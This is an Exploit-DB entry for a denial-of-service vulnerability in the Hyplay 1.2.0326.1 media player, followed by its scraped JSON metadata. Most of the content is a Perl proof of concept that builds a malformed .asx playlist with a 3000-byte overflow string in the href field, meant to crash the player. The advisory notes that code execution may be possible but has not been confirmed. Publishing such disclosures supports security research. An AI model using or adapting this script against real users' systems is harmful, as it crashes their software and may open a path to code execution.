Hyplay 1.2.0326.1 - .asx Remote Denial of Service Vulnerability
2010-05-10T00:00:00
ID EDB-ID:33973 Type exploitdb Reporter Steve James Modified 2010-05-10T00:00:00
Description
Hyplay 1.2.0326.1 '.asx' File Remote Denial of Service Vulnerability. Dos exploit for windows platform
source: http://www.securityfocus.com/bid/40048/info
Hyplay is prone to a remote denial-of-service vulnerability.
Attackers may leverage this issue to crash the affected application, denying service to legitimate users. Given the nature of this issue, the attacker may also be able to run arbitrary code, but this has not been confirmed.
Hyplay 1.2.0326.1 is vulnerable; other versions may also be affected.
#/usr/bin/perl
#Title: Hyplay 1.2.0326.1 (.asx) Local DoS crash PoC
#Download: http://www.hyplay.com/download.asp
#Written/Discovered by: xsploited Security
#Tested on Windows XP SP2
#URL: http://x-sploited.com/
#Shoutz: kAoTiX, drizzle, JeremyBrown, BreTT, Deca
#A bug exists in the way Hyplay processes malformed .asx play
#list files. This could potentially lead to code execution on
#the users machine.
my $data1=
"\x3C\x61\x73\x78\x20\x76\x65\x72\x73\x69\x6F\x6E\x20\x3D\x20".
"\x22\x33\x2E\x30\x22\x20\x3E\x0D\x0D\x0A\x3C\x65\x6E\x74\x72".
"\x79\x3E\x0D\x0D\x0A".
"\x3C\x72\x65\x66\x20\x68\x72\x65\x66\x20\x3D\x20\x22";
my $data2="http://";
my $data3= #asx file footer
"\x22\x20\x2F\x3E\x0D\x0A\x3C\x2F\x65\x6E\x74\x72\x79\x3E\x0D".
"\x0A\x3C\x2F\x61\x73\x78\x3E";
my $junk = "\x41" x 3000;
open(my $playlist, "> hyplay_d0s.asx");
print $playlist $data1.$data2.$junk.$data3."\r\n";
close $playlist;
print "\nEvil asx file created successfully.";
{"id": "EDB-ID:33973", "hash": "a71280c7a9068e916ce17475437cf16b", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Hyplay 1.2.0326.1 - .asx Remote Denial of Service Vulnerability", "description": "Hyplay 1.2.0326.1 '.asx' File Remote Denial of Service Vulnerability. Dos exploit for windows platform", "published": "2010-05-10T00:00:00", "modified": "2010-05-10T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/33973/", "reporter": "Steve James", "references": [], "cvelist": [], "lastseen": "2016-02-03T20:13:45", "history": [], "viewCount": 0, "enchantments": {"score": {"value": 0.0, "vector": "NONE", "modified": "2016-02-03T20:13:45"}, "dependencies": {"references": [], "modified": "2016-02-03T20:13:45"}, "vulnersScore": 0.0}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/33973/", "sourceData": "source: http://www.securityfocus.com/bid/40048/info\r\n\r\nHyplay is prone to a remote denial-of-service vulnerability.\r\n\r\nAttackers may leverage this issue to crash the affected application, denying service to legitimate users. Given the nature of this issue, the attacker may also be able to run arbitrary code, but this has not been confirmed.\r\n\r\nHyplay 1.2.0326.1 is vulnerable; other versions may also be affected. \r\n\r\n#/usr/bin/perl\r\n#Title: Hyplay 1.2.0326.1 (.asx) Local DoS crash PoC\r\n#Download: http://www.hyplay.com/download.asp\r\n#Written/Discovered by: xsploited Security\r\n#Tested on Windows XP SP2\r\n#URL: http://x-sploited.com/\r\n#Shoutz: kAoTiX, drizzle, JeremyBrown, BreTT, Deca\r\n \r\n#A bug exists in the way Hyplay processes malformed .asx play\r\n#list files. This could potentially lead to code execution on\r\n#the users machine.\r\n \r\nmy $data1= \r\n\"\\x3C\\x61\\x73\\x78\\x20\\x76\\x65\\x72\\x73\\x69\\x6F\\x6E\\x20\\x3D\\x20\".\r\n\"\\x22\\x33\\x2E\\x30\\x22\\x20\\x3E\\x0D\\x0D\\x0A\\x3C\\x65\\x6E\\x74\\x72\".\r\n\"\\x79\\x3E\\x0D\\x0D\\x0A\".\r\n\"\\x3C\\x72\\x65\\x66\\x20\\x68\\x72\\x65\\x66\\x20\\x3D\\x20\\x22\";\r\n \r\nmy $data2=\"http://\";\r\n \r\nmy $data3= #asx file footer\r\n\"\\x22\\x20\\x2F\\x3E\\x0D\\x0A\\x3C\\x2F\\x65\\x6E\\x74\\x72\\x79\\x3E\\x0D\".\r\n\"\\x0A\\x3C\\x2F\\x61\\x73\\x78\\x3E\";\r\n \r\nmy $junk = \"\\x41\" x 3000;\r\nopen(my $playlist, \"> hyplay_d0s.asx\");\r\nprint $playlist $data1.$data2.$junk.$data3.\"\\r\\n\";\r\nclose $playlist;\r\nprint \"\\nEvil asx file created successfully.\";\r\n", "osvdbidlist": [], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
